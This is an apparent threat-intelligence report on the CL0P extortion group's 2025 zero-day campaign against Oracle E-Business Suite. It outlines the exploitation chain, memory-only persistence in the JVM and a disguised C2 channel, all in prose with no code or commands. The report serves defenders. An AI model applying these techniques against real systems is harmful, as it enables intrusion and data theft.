CL0P Ransomware Group Targets Multiple Industries Globally Through Wide-Spread 0-Day Campaigns

CL0P is a financially motivated extortion group, with suspected ties to other financially motivated groups and clusters such as FIN11, UNC5936 and UNC6240. with a history of mass-exploitation campaigns against widely deployed enterprise software, including MOVEit, GoAnywhere MFT, and Cleo. Rather than deploying encryption broadly, the group has shifted toward large-scale data extortion — exploiting zero-day vulnerabilities in file transfer platforms (Accellion FTA, GoAnywhere MFT, MOVEit Transfer, Cleo, Oracle EBS, and Gladinet CentreStack) to steal data from hundreds to thousands of victims simultaneously, then threatening to publish it on their dark web leak site unless a ransom is paid.

The group began exploiting zero-day vulnerabilities in Oracle E-Business Suite in July 2025, accumulating significant volumes of stolen data before launching a coordinated extortion email campaign against corporate executives in late September of 2025. Throughout this campaign, the second most trageted sector was the entertainment industry. This acttivty was initally reported by Google in late 2025 after more than a 100 organizations were impacted by a vulnerability in Oracle E-Business Suite (CVE-2025-61882, CVSS 9.8).

Initial access was achieved through a multi-stage exploitation chain targeting the Oracle EBS web tier. Attackers combined server-side request forgery, CRLF injection, authentication bypass, and XSL template injection to achieve unauthenticated remote code execution as the EBS application account. A second attack path abused the XDO Template Manager to inject malicious templates directly into the EBS database, with execution triggered by the Template Preview functionality. Once inside, the attacker used a reflective Java class loader to load a secondary component entirely in JVM memory, which then installed a malicious WebLogic servlet filter without ever writing files to disk - bypassing file integrity monitoring entirely. A separate downloader maintained a persistent C2 channel by disguising its beacon traffic as a non-standard TLSv3.1 handshake over HTTPS, blending in with legitimate encrypted traffic.

After establishing a foothold, operators performed brief reconnaissance from the compromised EBS application account, collecting network configuration, running process lists, and host topology before exfiltrating data over the same C2 channel. CL0P used the stolen file listings as proof of access in extortion emails sourced through compromised third-party accounts and infostealer credential logs. Organizations that did not apply Oracle's emergency patches faced continued exposure through a second vulnerability, CVE-2025-61884, addressed in a follow-on patch on October 11, 2025.

The in-memory persistence chain is technically distinctive: the entire implant operates in JVM heap memory, defeating file-based detection and endpoint integrity tools. The donwloader's use of a fake TLSv3.1 protocol identifier, with C2 results returned inside HTML comment fields, closely mirrors techniques observed in a module attributed to UNC5936 in the December 2024 Cleo exploitation, suggesting shared tooling or developer overlap between the two campaigns.